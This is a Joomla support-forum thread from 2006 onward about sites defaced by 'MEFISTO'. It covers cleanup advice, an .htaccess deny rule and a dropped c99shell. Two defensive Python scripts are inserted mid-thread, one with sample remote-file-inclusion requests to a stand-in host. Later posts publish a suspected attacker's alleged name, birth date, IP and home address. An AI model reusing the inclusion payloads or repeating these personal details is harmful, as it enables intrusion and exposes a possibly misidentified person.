Hacked by MEFISTO
Moderator: General Support Moderators
Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
- jproducer
- Joomla! Intern
- Posts: 67
- Joined: Mon Sep 26, 2005 4:37 am
- Location: Denver
- Contact:
Hacked by MEFISTO
Well, looks like I stepped away from my site for about a month and got hacked. I guess I'm posting because I'm hoping if someone looks at the page they can see the errors and maybe give a little hand.
I can't give much info, but can investigate. I had joomla 1.0.9 and had several components. I am not a master joomla user like some of the other threads I read about this. I'm just posting hoping it might get some questions that I can try and investigate and answer.
Here's my site, just happened in the last couple of days. I haven't checked in about a week.
http://www.prettymess.net/main/
Man, I really put a lot of work into this site and it was just about my recording studio. I guess I was naive to believe that I was not going to be targeted by someone with too much time on their hands. My mistake.
(I'm sure you can probably sense the defeat in my post, this really bums me out)
If you heard that...you should be the engineer!
http://www.prettymess.net
- infograf768
- Joomla! Master
- Posts: 19133
- Joined: Fri Aug 12, 2005 3:47 pm
- Location: **Translation Matters**
Re: Hacked by MEFISTO
1. Please list all 3pd add-ons used on your site.
2. Look at the logs and search for the string "mosconfig", you will certainly pinpoint there the target of the hacker.
Normally, your database should be safe. It will therefore be just a matter of reinstalling Joomla (1.0.10 this time) and the right add-ons (updated to the new non-vulnerable versions obviously).
Jean-Marie Simonet / infograf
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group
- jproducer
- Joomla! Intern
- Posts: 67
- Joined: Mon Sep 26, 2005 4:37 am
- Location: Denver
- Contact:
Re: Hacked by MEFISTO
Ext Cal, Joombook, and joomlaxplorer, I believe.
I do recall a little trouble with my ext cal first.
If you heard that...you should be the engineer!
http://www.prettymess.net
- crash777
- Joomla! Explorer
- Posts: 334
- Joined: Sat Sep 03, 2005 1:56 am
- Location: Upstate New York
Re: Hacked by MEFISTO
infograf768 wrote: 1. Please list all 3pd add-ons used on your site.
2. Look at the logs and search for the string "mosconfig", you will certainly pinpoint there the target of the hacker.
Normally, your database should be safe. It will therefore be just a matter of reinstalling Joomla (1.0.10 this time) and the right add-ons (updated to the new non-vulnerable versions obviously).

Not just reinstalling though.. make sure to REMOVE everything first.. or go through each directory and clean it.. I had at least a hundred malicious script files interspersed in my joomla folders AND the htaccess files were all hacked too..
Thanks!
Aaron
- infograf768
- Joomla! Master
- Posts: 19133
- Joined: Fri Aug 12, 2005 3:47 pm
- Location: **Translation Matters**
Re: Hacked by MEFISTO
crash777 wrote:
infograf768 wrote: 1. Please list all 3pd add-ons used on your site.
2. Look at the logs and search for the string "mosconfig", you will certainly pinpoint there the target of the hacker.
Normally, your database should be safe. It will therefore be just a matter of reinstalling Joomla (1.0.10 this time) and the right add-ons (updated to the new non-vulnerable versions obviously).
Not just reinstalling though.. make sure to REMOVE everything first.. or go through each directory and clean it.. I had at least a hundred malicious script files interspersed in my joomla folders AND the htaccess files were all hacked too..

Right.
Jean-Marie Simonet / infograf
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group
-
- Joomla! Hero
- Posts: 2454
- Joined: Sun Aug 28, 2005 5:03 pm
Re: Hacked by MEFISTO
I believe there is an update for extcal available (forget where I read that...)
- Elpie
- Joomla! Guru
- Posts: 903
- Joined: Wed Aug 17, 2005 11:26 pm
- Contact:
Re: Hacked by MEFISTO
That announcement about the security update for ExtCalendar and links to download are here: http://forum.joomla.org/index.php/topic ... #msg402249
@jproducer - check your files via ftp to see the dates on which they were changed. Since you have been away it should be easy to spot files that were created or modified in the period you weren't doing any work on the site. In most cases, these crackers have not touched the database - a quick check through using phpMyAdmin or whatever you use for database management will tell you if your data has been compromised. If it's OK, the best thing to do would be to back up your database, back up your template folder to your PC (and check files carefully for any changes), then delete all files and do a clean install of Joomla 1.0.10. If your template is fine it's then just a matter of adding that back in and importing your database.
Before adding back any extensions, check the 3PD security forum to make sure you don't install something known to be insecure.
For Mambo assistance: http://forum.mambo-foundation.org
Open Source Research & Best Practice: http://osprojects.info
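The file-date check described in the post above, together with the directory-by-directory clean-up mentioned earlier in the thread, as an added example that is not part of the original posts. Because a modification time can be reset by whoever wrote the file, it also compares every file against a freshly unpacked copy of the same release; `site_root` (a downloaded copy of the hacked site) and `clean_root` (the unpacked release) are assumed local directories.

```python
import hashlib
import os
import sys
from datetime import datetime


def sha256_of(path):
    """Hash a file in chunks so large uploads do not fill memory."""
    h = hashlib.sha256()
    with open(path, 'rb') as fh:
        for chunk in iter(lambda: fh.read(65536), b''):
            h.update(chunk)
    return h.hexdigest()


def manifest(root):
    """Map relative path -> SHA-256 for every regular file under root."""
    out = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if os.path.islink(full):
                continue  # do not follow links out of the tree
            rel = os.path.relpath(full, root).replace(os.sep, '/')
            out[rel] = sha256_of(full)
    return out


def triage(site_root, clean_root, away_start, away_end):
    """Compare a site copy with a clean release and a 'nobody was working' window.

    away_start / away_end are datetime objects (local time).
    """
    start, end = away_start.timestamp(), away_end.timestamp()
    clean = manifest(clean_root)
    site = manifest(site_root)
    report = {
        # Not in the release: uploads, templates, configuration.php ... or droppers.
        'added': sorted(set(site) - set(clean)),
        # Shipped with the release but content differs (e.g. a rewritten index.php).
        'changed': sorted(p for p in site if p in clean and site[p] != clean[p]),
        # Shipped with the release but gone from the site.
        'missing': sorted(set(clean) - set(site)),
    }
    # The date check on its own; a file can be absent here and still be hostile.
    report['touched_while_away'] = sorted(
        p for p in site
        if start <= os.path.getmtime(os.path.join(site_root, p)) <= end
    )
    # Executable or access-control files that are new or altered come first.
    suspects = report['added'] + report['changed']
    report['review_first'] = sorted(
        p for p in suspects
        if p.lower().endswith('.php') or os.path.basename(p) == '.htaccess'
    )
    return report


if __name__ == '__main__':
    # usage: triage.py SITE_DIR CLEAN_DIR 2006-07-01 2006-08-01
    site_dir, clean_dir, first, last = sys.argv[1:5]
    result = triage(site_dir, clean_dir,
                    datetime.fromisoformat(first), datetime.fromisoformat(last))
    for section, paths in result.items():
        print('[%s]' % section)
        for p in paths:
            print('  ' + p)
```

Legitimate site files such as templates and configuration.php show up under `added` as well, so that list is a reading order, not a verdict.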
- jproducer
- Joomla! Intern
- Posts: 67
- Joined: Mon Sep 26, 2005 4:37 am
- Location: Denver
- Contact:
Re: Hacked by MEFISTO
Okay, my web provider has blocked my site and given me just ftp access. Now, they said that my mysql database wasn't wrecked. Is it possible to back up my database, install joomla fresh, then put back the database to save what I had?
I know this is a newbie question, but is it possible?
If you heard that...you should be the engineer!
http://www.prettymess.net
- brad
- Joomla! Master
- Posts: 13272
- Joined: Fri Aug 12, 2005 12:38 am
- Location: Australia
- Contact:
Re: Hacked by MEFISTO
jproducer wrote: Okay, my web provider has blocked my site and given me just ftp access. Now, they said that my mysql database wasn't wrecked. Is it possible to back up my database, install joomla fresh, then put back the database to save what I had?
I know this is a newbie question, but is it possible?

Yip. Just remove and replace your Joomla files. You will lose any non-core components/modules etc etc though. You might want to ensure you know how to configure your configuration.php file though... once new files are in place, setup configuration.php to connect to database and you should be good to go.
Brad Baker
https://xyzuluhosting.com
-
- Joomla! Fledgling
- Posts: 1
- Joined: Sat Jul 29, 2006 2:33 pm
Re: Hacked by MEFISTO
I'm another victim of this pirate called MEFISTO. My website was "defaced" using the c99shell script. The attack apparently is related to com_securityimages component.
During the minutes prior to my web site being hijacked by this [Edit by mod: watch your language. Using such terms will not help solve your problems] I found multiple requests of the form
Mod Edit: Please don't paste log files to the forums. Thank you. -RobS
To my surprise, this URL gives access to perform all kinds of operations on the filesystem. MEFISTO then proceeded to overwrite the "configuration.php" with a simple HTML page.
I have now the following in my .htaccess for protection:
RewriteCond %{QUERY_STRING} .*mosConfig_absolute_path.*
RewriteRule .* - [F,L]
which will give a HTTP 403 error on any subsequent attempt to exploit the bug. This is admittedly not a permanent solution.
Last edited by infograf768 on Sun Jul 30, 2006 5:41 am, edited 1 time in total.
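The log search for "mosconfig" suggested earlier in the thread, combined with the 403 responses the rewrite rule above produces, as an added example that is not part of the original posts. The log lines are constructed (documentation addresses, a hypothetical `com_example` component path and a placeholder host), and the Apache common/combined log format is assumed.

```python
import re
from urllib.parse import parse_qsl

# Apache common/combined format: host ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>[^\s"]+)[^"]*" (?P<status>\d{3})\b'
)
# A value that starts with a URL scheme means the include path pointed off-site.
REMOTE_RE = re.compile(r'^\s*(?:https?|ftps?)://', re.IGNORECASE)

# Constructed sample input, not taken from any real server.
SAMPLE_LOG = """\
192.0.2.10 - - [29/Jul/2006:14:01:12 +0000] "GET /index.php?option=com_content&task=view&id=5 HTTP/1.1" 200 8123
198.51.100.7 - - [29/Jul/2006:14:02:40 +0000] "GET /components/com_example/example.php?mosConfig_absolute_path=http://files.example.invalid/x.txt HTTP/1.1" 200 4410
198.51.100.7 - - [29/Jul/2006:14:03:05 +0000] "GET /components/com_example/example.php?option=x&mosConfig_absolute_path=http%3A%2F%2Ffiles.example.invalid%2Fx.txt HTTP/1.0" 200 4410
203.0.113.44 - - [30/Jul/2006:09:15:27 +0000] "GET /index.php?mosConfig_absolute_path=/tmp HTTP/1.1" 403 210
this line is not in log format and is skipped
"""


def scan_line(line):
    """Return one finding per mosConfig* query parameter on an access-log line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    path, _, query = m.group('target').partition('?')
    status = int(m.group('status'))
    findings = []
    # parse_qsl percent-decodes names and values before we compare them.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if not name.lower().startswith('mosconfig'):
            continue
        findings.append({
            'host': m.group('host'),
            'time': m.group('time'),
            'path': path,
            'param': name,
            'value': value,
            'remote_value': bool(REMOTE_RE.match(value)),
            'status': status,
            'blocked': status == 403,  # what the [F] rewrite rule returns
        })
    return findings


def scan_log(lines):
    """Scan an iterable of log lines and collect all findings in order."""
    findings = []
    for line in lines:
        findings.extend(scan_line(line))
    return findings


def needs_follow_up(findings):
    """Requests that carried a remote value and were not refused with 403."""
    return [f for f in findings if f['remote_value'] and not f['blocked']]


if __name__ == '__main__':
    hits = scan_log(SAMPLE_LOG.splitlines())
    for f in hits:
        verdict = 'blocked (403)' if f['blocked'] else 'status %d' % f['status']
        print('%s %s %s %s=%r -> %s' % (
            f['time'], f['host'], f['path'], f['param'], f['value'], verdict))
    print('hosts to investigate:',
          sorted({f['host'] for f in needs_follow_up(hits)}))
```

The `path` field of each unblocked finding names the script that received the parameter, which is the add-on to check against the 3PD security forum before reinstalling.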
- Autoit
- Joomla! Intern
- Posts: 59
- Joined: Sun Apr 09, 2006 4:01 pm
- Contact:
Re: Hacked by MEFISTO
my site:
/index.php:
Code: Select all
<html>
<head>
<meta http-equiv="Content-Language" content="tr">
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<title>HaCKed By MEFISTO</title>
</head>
<body bgcolor="#000000" text="#808080">
<p align="center"> </p>
<p align="center"> </p>
<p align="center">
<img src="http://img301.imageshack.us/img301/6885/takeittuxlo5.jpg"
width="200" height="300"></p>
<p align="center"> </p>
<p align="center"><font size="6"> HACKED By MEFISTO </font></p>
<p align="center"><font size="5">it's Not Hack..it's ******** BabE </font></p>
<p align="center"><font size="5">[email protected]</font></p>
<p align="center"><font size="5">ThanKs All My Friends..</font></p>
<p align="center"><font size="5">HACKED</font></p>
i find:
"/" added c99.php
"/components/com_jd-wiki/lib/tpl/default/" added .thumbs.php
in .thumbs.php:
Code: Select all
<?php
/*
******************************************************************************************************
*
* c99shell.php v.1.0 pre-release build #16
* Freeware license.
* [removed].
*
* WEB: http://[removed].ru
* ICQ UIN #: 656555
*
.
.
.
.
in c99.php:
Code: Select all
* c99shell.php v.1.0 beta
my site log in Attach:
[removed by moderator=--NEVER post vulnerable logs!]
Last edited by nathandiehl on Mon Aug 07, 2006 6:08 pm, edited 1 time in total.
### Joomla! AutoIt! ###
Joomla! Chinese Community Platform [Chinese GMT +8] http://www.autoit.cn
-
- Joomla! Guru
- Posts: 842
- Joined: Sat Sep 10, 2005 10:31 pm
Re: Hacked by MEFISTO
jd-wiki has been updated:
http://forge.joomla.org/sf/frs/do/viewR ... components
joomla_com_jd-wiki_v1.0.3:
http://forge.joomla.org/sf/frs/do/downl ... s6415?dl=1
You only need to update the template files though:
http://forum.joomla.org/index.php?topic=83724.new#new
We may not be able to control the wind, but we can always adjust our sails
- Predator
- Joomla! Ace
- Posts: 1823
- Joined: Wed Aug 17, 2005 10:12 pm
- Location: Germany-Bad Abbach
- Contact:
Re: Hacked by MEFISTO
There is no need to install the new version completely; only unzip and replace the templates default and nucleus in /components/com_jd-wiki/lib/tpl, that's it if you only want to update.
If you have Register Global Off you are secure, but to be sure also update the templates; the Remote Include Vulnerability works only with RG = On.
Last edited by Predator on Mon Aug 07, 2006 7:24 pm, edited 1 time in total.
The "Humor, Fun and Games" forum has more than 2500 Posts, so why not build a "Humor, Fun and Games Working" Group?
.....
Malicious tongues say we have this WG right from the start, they call it core team
- Autoit
- Joomla! Intern
- Posts: 59
- Joined: Sun Apr 09, 2006 4:01 pm
- Contact:
Re: Hacked by MEFISTO
thank all!
### Joomla! AutoIt! ###
Joomla! Chinese Community Platform [Chinese GMT +8] http://www.autoit.cn
- batje
- Joomla! Fledgling
- Posts: 4
- Joined: Sun Sep 04, 2005 7:43 am
- Location: Kampala, Uganda
- Contact:
Re: Hacked by MEFISTO
Just a bit of googling:
[email protected] brings you a lot of sites that have been hacked by this ingenious fellow. But no info. Although there is a lot of Turkish around these pages, somehow...
Doing a search for mefistofales brings up more interesting stuff, amongst which 3 profiles, one in Czech, one in Romania and this one, in Turkish:
http://www.blogcu.com/mefistofales
How many people would use this nickname and speak Turkish?
There is an email address: [email protected] And a profile page:
http://www.blogcu.com/mefistofales/profile/
with this info:
Blog: ve ve ve
in the hope of being a place where you can find everything
• Full Name: selcuk yardimciel
• Gender: Male
• Date of Birth: November 12, 1983 (Age: 22)
• Location: ankara, Turkiye
• Blog Category: Other (Diğer)
Posts I Have Written: 0 entries
Comments I Have Written: 0 comments
Comments Received: 0 comments
Registration Date: 10 May 2006
Last Login: 19 May 2006
Is there anyone who reads Turkish? For example, what does Diger stand for?
The attack on my server was performed using a script hosted under a Yahoo account called sikat_pl. You can see the code here: http://geocities.com/sikat_pl/nenen.txt
Sikat btw seems to be a Filipino word if you google for it.
The IP address from where the attack was staged was 125.160.81.175. I can't trace that address, even with http://www.ripe.net, my ISP does not allow me to do traceroutes either.
The second hacker btw was [email protected], and he also seems to master the Turkish language. I think he just started, because Google does not reveal a lot of information about this fellow.
Do other people have similar logs?
BTW, this post blocked the attack: http://forum.joomla.org/index.php/topic,75376.0.html
I just went into the backend of my website. I have a statistics component running. And guess what? It shows the last visitor! And guess what? He is from Turkey! And guess what? He has an ADSL modem. It's happily located at
dsl.static8510111679.ttnet.net.tr
If you were also hacked by this Mefisto guy, you can send an email to his provider at [email protected], asking for the guy's name and address so that you can file a lawsuit against him. Given the fact that he seems to be relatively active, and Turkey really wants to show it is ready to join the EU, I expect they will answer positively to this request.
Last edited by batje on Mon Aug 14, 2006 3:03 pm, edited 1 time in total.
OpenSource from Africa
http://www.mountbatten.net
- chilifrei64
- Joomla! Apprentice
- Posts: 31
- Joined: Thu Feb 16, 2006 9:40 pm
- Location: Detroit, MI
Re: Hacked by MEFISTO
Yeah, there has to be some sort of security hole in joomla. I am on the latest 1.0.10 and 3 of my sites were hit.
Only the index.php was rewritten on each site (at least all I could find)
Might be something to look into. I have not been able to find any c99.php script.. Only components are
joomlaxplorer (latest version)
my comment (this was installed the day it was hacked) (latest version)
community builder (updated a week ago after the new security release)
Hope this helps you figure it out.
-
- Joomla! Fledgling
- Posts: 1
- Joined: Mon Sep 10, 2007 2:11 pm
Re: Hacked by MEFISTO
Whoever this Mefisto is, he's nothing but a low-life hacker wannabe, any real hacker with any shred of dignity wouldn't stoop to something as low as trashing your website..
Find your dryer parts the easy way...
-
- Joomla! Apprentice
- Posts: 43
- Joined: Thu Nov 23, 2006 7:52 pm
Re: Hacked by MEFISTO
There are the details of this hacker's website: http://WWW.ROOTHACKER.ORG and
His e-mail is: [email protected]
Domain ID: D122651965-LROR
Domain Name: ROOTHACKER.ORG
Created On: 18-May-2006 21:19:50 UTC
Last Updated On: 21-Aug-2007 21:57:20 UTC
Expiration Date: 18-May-2008 21:19:50 UTC
Sponsoring Registrar: Directi Internet Solutions d/b/a PublicDomainRegistry.Com
(R27-LROR)
Status:OK
Registrant ID: DI_4725324
Registrant Name: Neo Anderson
Registrant Organization: A.S
Registrant Street1: Kadikoy iskele caddesi no:12
Registrant Street2:
Registrant Street3:
Registrant City: kadikoy
Registrant State/Province: Istanbul
Registrant Postal Code: 06000
Registrant Country: TR
Registrant Phone: +212.5555555
The same info for Admin and Technical contact.
His name is probably false [ref: Matrix] , but you never know. The address seems a legit personal home address.
The IP for these nameservers is: 80.93.221.97
The name servers are:
ROOT.ROOTHACKER.ORG
DAMAR.ROOTHACKER.ORG
Address DN Type Value
97.221.93.80.in-addr.arpa name host-80-93-221-97.teklan.com.tr
He has had 22 unique nameserver changes for this domain within the last year.
Other domain associations: hackturkiye.net as well as hackyurkiya.com
As his website contains illegal material, his illegal activity is attributable with a Google search and he seems to be hosting the site at home, I'd complain to Domain Name Registrar of .org domains and complain to the registering agent: Directi Internet Solutions, who are based in the USA, requesting deletion of the domain name.
Last edited by Nibblers on Mon Sep 10, 2007 3:54 pm, edited 1 time in total.
-
- Joomla! Apprentice
- Posts: 43
- Joined: Thu Nov 23, 2006 7:52 pm
Re: Hacked by MEFISTO
Some news - this person was behind the organisation many joomla hackers came from including MEFISTO...
http://thebellwetherdaily.[URL banned].com/ ... acker.html
Sunday, March 02, 2008
FBI Probing Ohio-based Computer Hacker: European Webhost Targeted From Cincinnati Surburb?
CINCINNATI (TDB) -- The FBI's computer crimes squad is on the trail of an Ohio hacker suspected of defacing Internet sites that use a company in Finland, Scene Group Oy, as their webhost. One of the targeted 'net sites reportedly was BahiaNetStore.com, which markets Brazilian-themed women's apparel. A federal magistrate authorized a search warrant last week for a Butler County home near Cincinnati where the hacker may have operated under the online screen name, or hacker tag, "Evilthoutz." No charges have been filed.
Scene Group is a private firm based in Pori, a city of more than 100,000 residents that is the 10th largest in Finland. A company official, Mikko Kivinen, is identified in a federal court affidavit obtained by The Daily Bellwether as first reporting the hacking incidents last November 28. Kivinen later traced the suspected hacker to an online bulletin board and a page on MySpace. Kivinen told the FBI his company was a target:
"Kivinen also stated that Evilthoutz was successful in hacking into the company's server and forwarding several e-mails to the e-mail address *****. During the hack, Evilthoutz tried to change the root password of the server and was unsuccessful. Evilthoutz then called the company hosting the servers, located in Texas, in an attempt to socially engineer the root password. Again, Evilthoutz was unsuccessful in changing the root password. Kivinen noted that the last website defacement occurred on December 27, 2007. Kivinen had no idea why Evilthoutz targeted his company."
The FBI said a confidential informant has contacted the suspected hacker online and discussed website defacements. Other records about Evilthoutz were subpoenaed from Microsoft and Cincinnati Bell, which operates a highspeed Internet service called Zoomtown.